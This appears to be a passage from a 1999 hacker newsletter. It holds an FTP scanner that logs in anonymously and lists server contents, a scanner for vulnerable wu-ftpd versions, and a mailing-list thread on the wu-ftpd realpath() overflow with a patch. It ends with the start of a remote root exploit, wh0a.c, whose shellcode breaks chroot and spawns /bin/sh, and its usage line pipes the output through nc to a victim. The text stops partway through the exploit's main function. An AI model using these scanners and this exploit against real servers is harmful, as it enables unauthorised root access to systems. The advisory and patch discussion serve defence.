fprintf(stdout,"\n------------------------------------------------------------------------------n");
fprintf(stdout,"IP: %s", host);
fflush(stdout);
signal(SIGALRM, sigh);
alarm(10);
if(connect(sockfd, (struct sockaddr *)&beb, sizeof(struct sockaddr)) < 0)
{
fprintf(stdout,"%s\n\n",homer);
fflush(stdout);
return;

}
alarm(0);
bzero(versi0n, sizeof(versi0n));
if ((nmb = recv(sockfd, versi0n, 5000, 0)) == -1)
{
fprintf(stdout,"Connection reset by peer?\n\n");
fflush(stdout);
}
if (strlen(versi0n) == 0)
{
close(sockfd);
return;
}
if (strstr(versi0n,"Microsoft") != NULL)
{
fprintf(stdout,"Skipping host, cuz its runing wind0ze\n\n");
fflush(stdout);
close(sockfd);
return;
}
if (strstr(versi0n,"WinSock") != NULL)
{
fprintf(stdout,"Skipping host, cuz its runing wind0ze\n\n");
fflush(stdout);
close(sockfd);
return;
}
if (strstr(versi0n,"NetWare") != NULL)
{
fprintf(stdout,"Skipping host cuz its runing NetWare\n\n");
fflush(stdout);
close(sockfd);
return;
}
if (strstr(versi0n,"Proxy Server") != NULL)
{
fprintf(stdout,"Runing ProxyServer, skipping host\n\n");
fflush(stdout);
close(sockfd);
return;
}

fprintf(stdout,"FTP banner:\n");
fprintf(stdout,"%s\n",versi0n);
fflush(stdout);
if (listing == 1)
{
char username[70],
sendear[17200],
listit[100];

int n;

/* login in */
strcpy(username,"anonymous");
sprintf(sendear,"USER %s\n",username);
fprintf(stdout,"Login as: %s\n",username);
write(sockfd,sendear,strlen(sendear));
read(sockfd,sendear,sizeof(sendear));
if (strstr(sendear,"denied") != NULL)
{
fprintf(stdout,"Anonymous access denied, skipping\n\n");
close(sockfd);
return;
}
if (strstr(sendear,"USER anonymous") != NULL)
{
fprintf(stdout,"Remote host has closed the connection.\n\n");
close(sockfd);
return;
}
if (strstr(sendear,"unknown") != NULL)
{
fprintf(stdout,"Anonymous access unknown\n\n");
close(sockfd);
return;
}
if (strstr(sendear,"not found") != NULL)
{
fprintf(stdout,"User anonymous not found\n\n");
close(sockfd);
return;
}
fprintf(stdout,"Answer: %s\n",sendear);
bzero(sendear, sizeof(sendear));
fprintf(stdout,"Using password: bleh@\n");
write(sockfd,"PASS bleh@\n",11);
read(sockfd,sendear,sizeof(sendear));
if (strstr(sendear,"Can't set") != NULL)
{
fprintf(stdout,"Cant set guest privileges\n\n");
close(sockfd);
return;
}
fprintf(stdout,"Answer: %s\n",sendear);
bzero(sendear, sizeof(sendear));
fprintf(stdout,"Setting PORT to %d\n",17886+lala);
bzero(beer,sizeof(beer));
sprintf(beer,"PORT %d,%d,%d,%d,69,%d\nLIST -lR\n",ip1, ip2, ip3 ,ip4, 222 + lala);
write(sockfd,beer,strlen(beer) + 4);
read(sockfd,beer,sizeof(beer));
/* bind the port for data transfer */
sockfd1 = bindit(SOCK_STREAM, port2, &lsock);
read(sockfd,sendear,sizeof(sendear));
fprintf(stdout,"Using LIST command\n");
fprintf(stdout,"Answer: %s\n",sendear);
bzero(sendear, sizeof(sendear));
read(sockfd1,sendear,sizeof(sendear));
fprintf(stdout,"Recursive list:\n %s\n",sendear);
bzero(sendear, sizeof(sendear));
fflush(stdout);
// lala++;
}
close(sockfd);
close(sockfd1);
}

int bindit(int socket_type, u_short port, int *listener)
{
struct sockaddr_in address;
int listening_socket;
int connected_socket = -1;
int reuse_addr = 1;
char sendear[17200];

port = htons(17886+lala);
memset((char *) &address, 0, sizeof(address));
address.sin_family = AF_INET;
address.sin_port = port;
address.sin_addr.s_addr = htonl(INADDR_ANY);

listening_socket = socket(AF_INET, socket_type, 0);
if (listening_socket < 0)
{
fprintf(stdout,"Cant recive list.\n\n");
fflush(stdout);
return;
}

if (listener != NULL)
*listener = listening_socket;

setsockopt(listening_socket, SOL_SOCKET, SO_REUSEADDR, &reuse_addr, sizeof(reuse_addr));

if (bind(listening_socket, (struct sockaddr *) &address, sizeof(address)) < 0)
{
fprintf(stdout,"Error\n\n");
fflush(stdout);
close(listening_socket);
exit(1);
}

listen(listening_socket, 1);
signal(SIGALRM, sigh);
alarm(10);

while(connected_socket < 0)
{
connected_socket = accept(listening_socket, NULL, NULL);
}
}

void sigh(int z)
{
alarm(0);
signal(SIGALRM, SIG_DFL);
strcpy(homer,"Unable to connect: timeout");
}


u_long lip (void)
{
int pvto,
yesto,
traversal;
struct sockaddr_in *dim0n;
struct ifreq *i;
struct ifconf ic;
char bufercito[512];

pvto = socket (AF_INET, SOCK_STREAM, 0);
ic.ifc_pum = 512;
ic.ifc_buf = bufercito;
ioctl (pvto, SIOCGIFCONF, (char *) &ic);
i = ic.ifc_req;
yesto = (ic.ifc_pum / sizeof(struct ifreq));
for (traversal = 0; traversal < yesto; traversal++) {

ioctl(pvto, SIOCGIFADDR, (char *) &i);
dim0n = (struct sockaddr_in *) &i->ifr_ifru.ifru_addr;
if (!strcmp (i->ifr_name, huhense))
return dim0n->sin_addr.s_addr;
i++;
}
}

void usage(char *damn)
{
printf("\n<[( ftpscan 1.o by vENOMOUS of rdC - venomous@iname.com - o3/99 )]>");
printf("<[( usage:\n");
printf("<[( %s -f file [-p port] [-o]\n\n",damn);
printf("<[( -f file: file is the IPs file.\n");
printf("<[( -p port: port to connect to, default 21.\n");
printf("<[( -o: with this flag, ftpscan will log into the FTPserver\n");
printf("<[( as anonymous, and do a recursive list.\n\n");
exit(0);
}

-----[ end of ftpscan.c ]-----


-----[ cut here, blah.h ]-----

#include <stdio.h>
#include <fcntl.h>
#include <linux/sockios.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <errno.h>
#include <string.h>

#define NOMBRESIZE 16

struct ifmap
{
unsigned long mem_start;
unsigned long mem_end;
unsigned short base_addr;
unsigned char irq;
unsigned char dma;
unsigned char port;
/* 3 bytes spare */
};
struct ifreq
{


union
{
char ifrn_name[NOMBRESIZE]; /* if name, e.g. "en0" */
} ifr_ifrn;
union {
struct sockaddr ifru_addr;
struct sockaddr ifru_dstaddr;
struct sockaddr ifru_broadaddr;
struct sockaddr ifru_netmask;
struct sockaddr ifru_hwaddr;
short ifru_flags;
int ifru_metric;
int ifru_mtu;
struct ifmap ifru_map;
char ifru_slave[NOMBRESIZE]; /* Just fits the size */
caddr_t ifru_data;
} ifr_ifru;
};

#define ifr_name ifr_ifrn.ifrn_name /* interface name */
#define ifr_hwaddr ifr_ifru.ifru_hwaddr /* MAC address */
#define ifr_addr ifr_ifru.ifru_addr /* address */
#define ifr_dstaddr ifr_ifru.ifru_dstaddr /* other end of p-p lnk */
#define ifr_broadaddr ifr_ifru.ifru_broadaddr /* broadcast address */
#define ifr_netmask ifr_ifru.ifru_netmask /* interface net mask */
#define ifr_flags ifr_ifru.ifru_flags /* flags */
#define ifr_metric ifr_ifru.ifru_metric /* metric */
#define ifr_mtu ifr_ifru.ifru_mtu /* mtu */
#define ifr_map ifr_ifru.ifru_map /* device map */
#define ifr_slave ifr_ifru.ifru_slave /* slave device */
#define ifr_data ifr_ifru.ifru_data /* for use by interface */

struct ifconf
{
int ifc_pum; /* size of buffer */
union
{
caddr_t ifcu_buf;
struct ifreq *ifcu_req;
} ifc_ifcu;
};
#define ifc_buf ifc_ifcu.ifcu_buf /* buffer address */
#define ifc_req ifc_ifcu.ifcu_req /* array of structures */

-----[ end of blah.h ]-----

Have fun!


@HWA

26.0 WuFTP scanner
~~~~~~~~~~~~~

/* This is probably more script-kiddie-ish than the last wu-ftpd scanner,
but with almost no modifications you can make Lord Somer's IMAPVuln
into a scanner that will look for anything, probably no point in
putting it on the page, I'm sure someone will code one from scratch.
- SellOut
*/

/*
IMAPVuln Scanner
By: Lord Somer <webmaster@lordsomer.com>

Scans the ips in a file to see if they run a vulnerable version of imap then output to a file
Checks if ver is 9.0, 10.166, 10.171, 10.183, 10.190, 10.205, 10.223, 10.233
Thanks to guy who made statd scanner, warchld for some of the other vulnerable version #'s.
*/

#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <time.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>

/*
connect_timeo taken from mscan by jsbach
*/

#define TIMEOUT 5
#include <errno.h>
#include <stdlib.h>
#ifdef LINUX
#include <sys/time.h>
#endif
typedef void Sigfunc (int);

void connect_alarm(int signo);

int connect_timeo(int sockfd, struct sockaddr *saptr, int salen, int nsec) {
int n;
alarm(0);
signal(SIGALRM,connect_alarm);
alarm(TIMEOUT);

if( (n = connect(sockfd, (struct sockaddr *) saptr, salen)) < 0) {
close(sockfd);
if(errno == EINTR)
errno = ETIMEDOUT;
}
alarm(0);
signal(SIGALRM, SIG_DFL);
return(n);
}

void connect_alarm(int signo) {
return;
}
/* end jsbach's code */

void usage(char *s) {
printf("Original Usage");
printf("IMAPVuln Scanner v1.0\n");
printf("Usage: %s <inputfile> <outputfile>\n",s);
printf(" By: Lord Somer <webmaster@lordsomer.com>\n");
printf(" Check out efnet #sploits and\nThe Hackers Layer http://www.lordsomer.com\n");
printf("This is modified to scan for, probably, exploitable wu-ftpds, same syntax.\n");
exit(-1);
}

unsigned long int res(char *p)
{
struct hostent *h;
unsigned long int rv;

h=gethostbyname(p);
if(h!=NULL)
memcpy(&rv,h->h_addr,h->h_length);
else
rv=inet_addr(p);
return rv;
}

void imapscan(char *i, char *o) {
FILE *iff, *of;
char buf[512];
if((iff=fopen(i,"r")) == NULL)
return;
while(fgets(buf,512,iff) != NULL) {
if(buf[strlen(buf)-1]=='\n')
buf[strlen(buf)-1]=0;
if(imapvuln(buf) == 1 && (of=fopen(o,"a")) != NULL) {
buf[strlen(buf)+1]=0;
buf[strlen(buf)]='\n';
fputs(buf,of);
fclose(of);
}
}
fclose(iff);
}
int imapvuln(char *host) {
int sockfd;
int len;
struct sockaddr_in address;
int result;
char buffer[200];

sockfd = socket(AF_INET, SOCK_STREAM, 0);

address.sin_family = AF_INET;
address.sin_addr.s_addr = res(host);
address.sin_port = htons(21);

len = sizeof(address);
if (connect_timeo(sockfd, (struct sockaddr *)&address, len, 2) == -1) {
/* Host timed out, thus not vulnerable */
close(sockfd);
return 0;
}
result = read(sockfd, buffer, sizeof(buffer));

/*
* We look for all versions that we know are vulnerable, i did it this way so it's easy to add
* in new versions that an exploit comes out for.
*/

/* This is the only part I had to change, except for the port.
I based what it looks for on the comments by Gregory A Lundberg on
BugTraq, we could get very specific here, but for times sake I don't
think we need to. - SellOut
*/

if (strstr(buffer,"Version wu-2.4.2-academ[BETA-1"));
{
close(sockfd);
return 1;
}
close(sockfd);
return 0;
}
int main(int argc, char **argv) {
if (argc < 3)
usage(argv[0]);
imapscan(argv[1], argv[2]);
return 1;
}


@HWA

27.0 The Wu-FTPd exploit and patch thread
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From: owner-wu-ftpd@wugate.wustl.edu [mailto:owner-wu-ftpd@wugate.wustl.
edu] On Behalf Of Gregory A Lundberg
Sent: Tuesday, March 23, 1999 10:44 AM
To: Russ Allbery
Cc: ayu1@nycap.rr.com; wu-ftpd@wugate.wustl.edu
Subject: Re: FW: ftp exploit
>
>
On 23 Mar 1999, Russ Allbery wrote:
>
> > any comments?
>
> It's an exploit script for the path overflow bug that's already been
> announced by CERT, been on all the security lists, and has already
> been fixed in the latest version of every wu-ftpd variant that I'm
> aware of as well as being the impetus for the final mainline wu-ftpd
> release?
>
Correct. This is a full exploit against Redhat 5.2 (the original advisory
was based upon a test, not an exploit).
>
My comment: This posting proves why you need to keep up with the CERT
mailing list, if not Bugtraq and other lists. As often heppens, the
exploit followed the discovery of the vulnerability by several weeks.
While it sometimes happens that exploits are distributed before the daemon
authors are notified and public security announcement made, this was not
the case here.
>
>
>
My testing shows:
>
This is an exploit using the buffer overflow described in
>
CERT Advisory CA-99.03 - FTP-Buffer-Overflows
>
Available from htp://www.CERT.org/
>
It is directed solely at Redhat CD 4.2 Linux systems running a clean,
default install. It was not successfull on unclean 5.2 systems, the
pre-5.2 systems I tested on, or when I built the daemon by-hand instead of
using a Redhat (S)RPM. My testing showed, while none of the systems I
have available were exploitable, the exploit WOULD HAVE WORKED but failed
for identifiable reasons.
>
Given working code for Redhat 4.2, it should be a fairly simply matter to
port to non-Linux or non-5.2 systems.
>
>
>
WHO IS VULNERABLE
-----------------
>
- Systems running ALL versions of WU-FTPD _prior_ to 2.4.2 (final),
including all 2.4.2-beta versions, ARE VULNERABLE, except as noted
below:
>
- Systems with proper upload clauses are partially protected. Many
systems do not use proper upload clauses for real/guest users and are
NOT protected from abuse by their local users.
>
- Systems with proper permissions are partially protected. Most systems
do not use proper permissions for real/guest users since they would
prevent use by Telnet/SSH/Shell .. such systems are NOT protected from
their local users.
>
>
>
WHO IS NOT VULNERABLE
---------------------
>
- Systems running 2.4.2 (final) are protected against _this_ bug. Such
systems should upgrade to VR16 for maximum security; a number of other
bugs and security problems have been fixed in VR16.
>
- Systems running 2.4.2-beta-18-VR10 or later are protected. Anyone
running VR10 through VR13 should upgrade to VR14 or later at your
earliest convenience.
>
- Systems running BeroFTPD 1.2.0 or later are NOT vulnerable. All
BeroFTPD systems should upgrade to the current version (1.3.4) at their
earliest conenience. Anyone running a vulnerable system with NEWVIRT,
will want to immedeately upgrade to BeroFTPD.
>
>
>
The location of the latest version of wu-ftpd can be found in the
directory
>
ftp://ftp.vr.net/pub/wu-ftpd/
>
>wu-ftpd Resource Center: http://www.landfield.com/wu-ftpd/
>wu-ftpd FAQ: http://www.cetis.hvu.nl/~koos/wu-ftpd-faq.html
>wu-ftpd list archive: http://www.landfield.com/wu-ftpd/mail-archive/
>
>--
>
>Gregory A Lundberg Senior Partner, VRnet Company
>1441 Elmdale Drive lundberg+wuftpd@vr.net
>Kettering, OH 45409-1615 USA 1-800-809-2195

------------------------------------------------------------------------------

Date: Thu, 25 Mar 1999 22:17:33 -0500
From: Gregory A Lundberg <lundberg+wuftpd@VR.NET>
To: BUGTRAQ@netspace.org
Subject: Re: wu-ftpd overflow.

On Sun, 21 Mar 1999, CyberPsychotic wrote:

> (cc'ed to bugtraq since I haven't seen yet any patches fixing this
> problem were posted there)

Yes, the exploit recently posted to Bugtraq takes advantage of the
realpath() buffer overflows .. as they exist in the Redhat RPM version
shipped on their 5.<something> CD. The exploit may require some
modification to be successfully used against other Linux/Intel systems
and, of course, will need major changes to be used against other hardware
or software platforms.

About the exploit posted on Bugtraq: my read-through of the shows it does
use the vulnerability through the MKD command. You are correct that some
Academ beta versions do not use the source-provided vulnerable realpath()
function for MKD. ISTM it should be fairly easy to modify the exploit to
make use of other commands where a given Academ beta version _does_ use
realpath(). Remember, the exploit is an _example_ of the problem, it does
not reveal the true magnetude of the vulnerability. A positive test
proves vulnerability while a negative test proves nothing.

The vulnerable and non-vulnerable versions were outlined in the advisories
which _were_ posted on Bugtraq.

The realpath() problem was openly discussed on Bugtraq weeks (months? ..
I'd have to look through the Bugtraq archives again) before the release of
the advisories. The actively maintained versions of the wu-ftpd daemon
were immedeately corrected as a result of the realpath() vulnerability
discussions on Bugtraq, so they had been corrected for quite some time
prior to Netect's research indicating there may be a problem.

At the time of publication of the Netect/CERT Advisories, patches for
wu-ftpd were unnecessary since the current, maintained, versions were not
vulnerable.

My patch file for wu-ftpd, which corrects the problem, is presently 644162
bytes in length, fixes several hundred other problems with the daemon, and
is available via FTP from ftp://ftp.vr.net/pub/wu-ftpd/ for those silly
enough to want it (I rather doubt it Aleph would allow it through to the
Bugtraq the mailing list). I am not inclined to pull out the patches for
realpath() because the entire pile of male bovine by-product was replaced.

A patch file for the other major, maintained, version of wu-ftpd
(BeroFTPD) is not available at all. Since today it would probably run
well over 1 Meg, the maintainer sees no point in the fiction of
'patching'. He is also dis-inclined to pull out the realpath() changes
since he and I co-operated on the complete replacement of the function
(actually he did most of the initial work; I just debugged it).

At about the time of the Netect/CERT Advisorie Redhat released updated
RPMs for the vulnerable Academ 2.4.2-betas they distribute. I don't know
whether they released before or after, but I do recall it was just a few
hours before their availability was discussed on Bugtraq.

Other versions (from wu-stl and academ) are not actively maintained and
should not be used in production environments. Anyone running versions of
wu-archive / the wu-ftpd daemon older than Academ's 2.4.2-beta-18 has more
severe problems than this buffer overrun, so I see no point posting the
patch. For them the correct solution is either updating to a more current
version or manual operation of the power switch.

The only current version still vulnerable when the CERT advisory was
issued the Academ version 2.4.2-beta-18, which is (almost) not actively
maintained. A week or two following the CERT advisory Academ silently
released 2.4.2 (final).

My knowledge of the code, and my direct research indicates:

The 2.4.2 (final) version does not completely solve the problem. Nor
does your patch. (Nor, for that matter, does the Redhat patch but
that's a moot point since their patch does fix the problem for their
Linux systems.)

For systems using the realpath() function supplied with the source kit,
a patch will work to correct, or at least hide, most, if not all, of
the vulnerability. For other systems, whether or not the daemon is
vulernable depends upon whether or not your vendor-supplied realpath()
function is vulnerable (back to the original discussion on Bugtraq).

The only change here from my recommendations appearing in the Netect
and CERT advisories is that the number of potentially vulnerable
systems has been reduced by those using the daemon-supplied realpath()
function to only those with vendor-supplied vulnerable realpath()
functions.

To determine if your daemon uses the supplied function, look in
<wuftpd>/src/config/config.<ostype> for a line reading something like:

#define realpath realpath_on_steroids

If this #define does NOT appear, contact your vendor concerning the
vulnerability of the realpath() function, or upgrade to a more-current
version of the daemon (yes, there are versions much more current that
Academ's 2.4.2/final).

Those wishing further information may contact me via the wu-ftpd support
mailing list at mailto:wu-ftpd@wugate.wustl.edu .. subscription and
unsubscription information for that mailing list are in the FAQ.

The location of the latest versions of wu-ftpd can be found in the
directory

ftp://ftp.vr.net/pub/wu-ftpd/

wu-ftpd Resource Center: http://www.landfield.com/wu-ftpd/
wu-ftpd FAQ: http://www.cetis.hvu.nl/~koos/wu-ftpd-faq.html
wu-ftpd list archive: http://www.landfield.com/wu-ftpd/mail-archive/
(The html version of the wu-ftpd list archive is
currently not working, use the Unix mailbox
format instead.)

--

Gregory A Lundberg Senior Partner, VRnet Company
1441 Elmdale Drive lundberg+wuftpd@vr.net
Kettering, OH 45409-1615 USA 1-800-809-2195

------------------------------------------------------------------------------

Date: Sun, 21 Mar 1999 18:21:22 +0500
From: CyberPsychotic <fygrave@TIGERTEAM.NET>
To: BUGTRAQ@netspace.org
Subject: wu-ftpd overflow.

~ Has some1 located the file/function where
~ the overflow takes place ?


Yes. I think overflow takes place is function realpath.c:
look at the end of the function realpath(), which first concatinates
everything together and then just does strcpy into result variable, which is
pointer to buffer sized of MAXPATHLEN. You could either owerflow workpath
variable in realpath, or, if your buffer is not too fat, it will be
overflowed later, when function makedir returns (called from ftpcmd).
in either case return address gets overflowed and it returns
nowhere (or to your exploit code if you put there such, no big deal).
I've made a couple of fixes to ftpd daemon to generate debugging info via
syslog, so here's what I have:

Mar 21 12:21:46 gear ftpd[21737]: ftpcmd:1294 (ftpcmd called makedir)
Mar 21 12:21:46 gear ftpd[21737]: before 3180 (calling realpath line 3128)
Mar 21 12:21:46 gear ftpd[21737]: overflow:180 (here overflow takes place)
Mar 21 12:21:46 gear ftpd[21737]: overflow:210 (again. It's being copied twice)
Mar 21 17:21:47 gear syslogd: Cannot glue message parts together
Mar 21 12:21:46 gear ftpd[21737]: after 3180 (realpath line 3128 returns)
/foo/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Mar 21 17:21:47 gear
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Mar 21 12:21:47 gear ftpd[21737]: exiting on signal 11

oops..... now it attempted to execute piece at 0x41414141 addy..


Some previous beta releases of wu-ftpd are NOT vulneriable
to this thing because they just don't call realpath function (which does
overflow) from makedir() function. Here's quick patch I've done to this
piece (cc'ed to bugtraq since I haven't seen yet any patches fixing this
problem were posted there):

--/cut here/--

--- ftpd.c.orig Mon Jul 6 15:14:25 1998
+++ ftpd.c Sun Mar 21 18:17:52 1999
@@ -3146,19 +3146,24 @@

if (mkdir(name, 0777) < 0) {
if (errno == EEXIST){
- realpath(name, path);
- reply(521, "\"%s\" directory exists", path);
+ if(realpath(name, path))
+ reply(521, "\"%s\" directory exists.", path);
+ else reply(521,"path too long.");
}else
perror_reply(550, name);
return;
}
- realpath(name, path);
/* According to RFC 959:
* The 257 reply to the MKD command must always contain the
* absolute pathname of the created directory.
* This is implemented here using similar code to the PWD command.
* XXX - still need to do `quote-doubling'.
*/

+ if(!realpath(name, path))
+ if (strlen(path)!=0)
+ reply(257,"\"%s\" directory created name truncated.",path);
+ else reply(500,"no directory created. Path too long.");
+ else
reply(257, "\"%s\" new directory created.", path);
}

--- realpath.c.orig Sun Mar 21 17:29:42 1999
+++ realpath.c Sun Mar 21 18:08:28 1999
@@ -40,6 +40,7 @@
#include <sys/stat.h>
#include <sys/param.h>
#include <string.h>
+#include <syslog.h>

#ifndef HAVE_SYMLINK
#define lstat stat
@@ -55,10 +56,10 @@
#endif
{
struct stat sbuf;
- char curpath[MAXPATHLEN],
- workpath[MAXPATHLEN],
- linkpath[MAXPATHLEN],
- namebuf[MAXPATHLEN],
+ char curpath[MAXPATHLEN+1],
+ workpath[MAXPATHLEN+1],
+ linkpath[MAXPATHLEN+1],
+ namebuf[MAXPATHLEN+1],
*where,
*ptr,
*last;
@@ -75,7 +76,7 @@
return(NULL);
}

- strcpy(curpath, pathname);
+ strncpy(curpath, pathname,MAXPATHLEN);

if (*pathname != '/') {
uid_t userid;
@@ -93,7 +94,7 @@
#else
if (!getwd(workpath)) {
#endif
- strcpy(result, ".");
+ strncpy(result, ".",MAXPATHLEN);
seteuid(userid);
enable_signaling(); /* we can allow signals once again: kinch */
return (NULL);
@@ -142,9 +143,13 @@
for (last = namebuf; *last; last++)
continue;
if ((last == namebuf) || (*--last != '/'))
- strcat(namebuf, "/");
- strcat(namebuf, where);
-
+ strncat(namebuf, "/",MAXPATHLEN-strlen(namebuf));
+ strncat(namebuf, where,MAXPATHLEN-strlen(namebuf));
+ if (strlen(namebuf)+strlen(where)>=MAXPATHLEN) {
+ syslog(LOG_DAEMON|LOG_NOTICE,"possible buffer overflow attempt");
+ return(NULL);
+ }
+
where = ++ptr;
if (lstat(namebuf, &sbuf) == -1) {
strcpy(result, namebuf);
@@ -163,8 +168,13 @@
if (*linkpath == '/')
*workpath = '\0';
if (*where) {
- strcat(linkpath, "/");
- strcat(linkpath, where);
+ strncat(linkpath, "/",MAXPATHLEN-strlen(linkpath));
+ strncat(linkpath, where,MAXPATHLEN-strlen(linkpath));
+ if (strlen(namebuf)+strlen(where)>=MAXPATHLEN) {
+ syslog(LOG_DAEMON|LOG_NOTICE,
+ "possible buffer overflow attempt");
+ return(NULL);
+ }
}
strcpy(curpath, linkpath);
goto loop;

@HWA

28.0 wh0a.c wu-FTPd beta exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Thu, 25 Mar 1999 15:42:47 +0100
From: Pieter Nieuwenhuijsen <pietern@XS4ALL.NL>
To: BUGTRAQ@netspace.org
Subject: another ftp exploit

/*

wu-ftpd mkdir v2.4.2-beta18 remote rewt spl01t v1.20 ( linux x86 )
by joey__ <youcan_reachme@hotmail.com> of rhino9 <http://www.rhino9.com> - 2/20/99

big thx horizon, duke, nimrood and icee
sh0utz neonsurge, xaphan, joc, sri, aalawaka, and aakanksha

USAGE:

( ./wh0a [ initialdir ] [ <username> <password> ] [ <offset> <code address> ] ; cat ) | nc <victimname> <victimport>

*/


#include <stdio.h>

char x86_shellcode0[156] =

"\x83\xec\x04" /* sub esp,4 */
/* esi -> local variables and data */
"\x5e" /* pop esi */
"\x83\xc6\x70" /* add esi,0x70 */
"\x83\xc6\x20" /* add esi,0x20 */


"\x8d\x5e\x0c" /* lea ebx,[esi+0x0c] */
/* decode the strings */
"\x31\xc9" /* xor ecx, ecx */
"\xb1\x30" /* mov cl,0x30 */
"\x80\x2b\x32" /* sub byte ptr [ebx],0x32 */
"\x43" /* inc ebx */
"\x49" /* dec ecx */
"\x75\xf9" /* jnz short decode_next_byte */

"\x31\xc0" /* xor eax,eax */
/* setuid ( 0 ) */
"\x89\xc3" /* mov ebx,eax */
"\xb0\x17" /* mov al,0x17 */
"\xcd\x80" /* int 0x80 */

"\x31\xc0" /* xor eax,eax */
/* setgid ( 0 ) */
"\x89\xc3" /* mov ebx,eax */
"\xb0\x2e" /* mov al,0x2e */
"\xcd\x80" /* int 0x80 */

/* To break chroot we have to...

fd = open ( ".", O_RDONLY );
mkdir ( "hax0r", 0666 );
chroot ( "hax0r" );
fchdir ( fd );
for ( i = 0; i < 254; i++ )
chdir ( ".." );
chroot ( "." );

*/


"\x31\xc0" /* xor eax,eax */
/* var0 = open ( ".", O_RDONLY ) */
"\x31\xc9" /* xor ecx,ecx */
"\x8d\x5e\x0f" /* lea ebx,[esi+0x0f] */
"\xb0\x05" /* mov al,0x05 */
"\xcd\x80" /* int 0x80 */
"\x89\x06" /* mov [esi],eax */

"\x31\xc0" /* xor eax,eax */
/* mkdir ( "hax0r", 0666 ) */
"\x8d\x5e\x11" /* lea ebx,[esi+0x11] */
"\x8b\x4e\x1f" /* mov ecx,[esi+0x1f] */
"\xb0\x27" /* mov al,0x27 */
"\xcd\x80" /* int 0x80 */

"\x31\xc0" /* xor eax,eax */
/* chroot ( "hax0r" ) */
"\x8d\x5e\x11" /* lea ebx,[esi+0x11] */
"\xb0\x3d" /* mov al,0x3d */
"\xcd\x80" /* int 0x80 */

"\x31\xc0" /* xor eax,eax */
/* fchdir ( fd ) */
"\x8b\x1e" /* mov ebx,[esi] */
"\xb0\x85" /* mov al,0x85 */
"\xcd\x80" /* int 0x80 */

"\x31\xc9" /* xor ecx, ecx */
/* for ( i = 0; i < 254; i++ ) { */
"\xb1\xfe" /* mov cl,0xfe */

"\x31\xc0" /* xor eax,eax */
/* chdir ( ".." ) */
"\x8d\x5e\x0c" /* lea ebx,[esi+0x0c] */
"\xb0\x0c" /* mov al,0x0c */
"\xcd\x80" /* int 0x80 */

"\x49" /* dec ecx */
/* } */
"\x75\xf4" /* jnz short goto_parent_dir */

"\x31\xc0" /* xor eax,eax */
/* chroot ( "." ) */
"\x8d\x5e\x0f" /* lea ebx,[esi+0x0f] */
"\xb0\x3d" /* mov al,0x3d */
"\xcd\x80" /* int 0x80 */

"\x31\xc0" /* xor eax,eax */
/* execve ( "/bin/sh", "xxxxx", NULL ) */
"\x8d\x5e\x17" /* lea ebx,[esi+0x17] */
"\x8d\x4e\x04" /* lea ecx,[esi+0x04] */
"\x8d\x56\x08" /* lea edx,[esi+0x08] */
"\x89\x19" /* mov [ecx],ebx */
"\x89\x02" /* mov [edx],eax */
"\xb0\x0b" /* mov al, 0x0b */
"\xcd\x80" /* int 0x80 */

"\x31\xdb" /* xor ebx,ebx */
/* exit ( 0 ) */
"\x89\xd8" /* mov eax,ebx */
"\x40" /* inc eax */
"\xcd\x80" /* int 0x80 */

"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"
"\x90"

"var0"
/* local variable integer */
"cmd0"
/* char *cmd[2] */
"cmd1";


char x86_shellcode1[1024] =
".."
"\x00"
"."
"\x00"
"hax0r"
"\x00"
"/bin/sh"
"\x00"
"\xb6\x01\x00\x00";


char vardir[300];
int varlen;


main ( int argc, char **argv )
{

char *username, *password, *initialdir;
int bufoffset, codeaddr, i, j, *pcodeaddr;

if ( argc > 1 )
initialdir = argv[1];
else initialdir = "/incoming";

if ( argc > 3 )
{
username = argv[2];
password = argv[3];
}
else
{
username = "anonymous";
password = "poon@ni.com";
}

if ( argc > 5 )
{
bufoffset = atoi ( argv[4] );
codeaddr = atoi ( argv[5] );
}
else
{
bufoffset = 195;
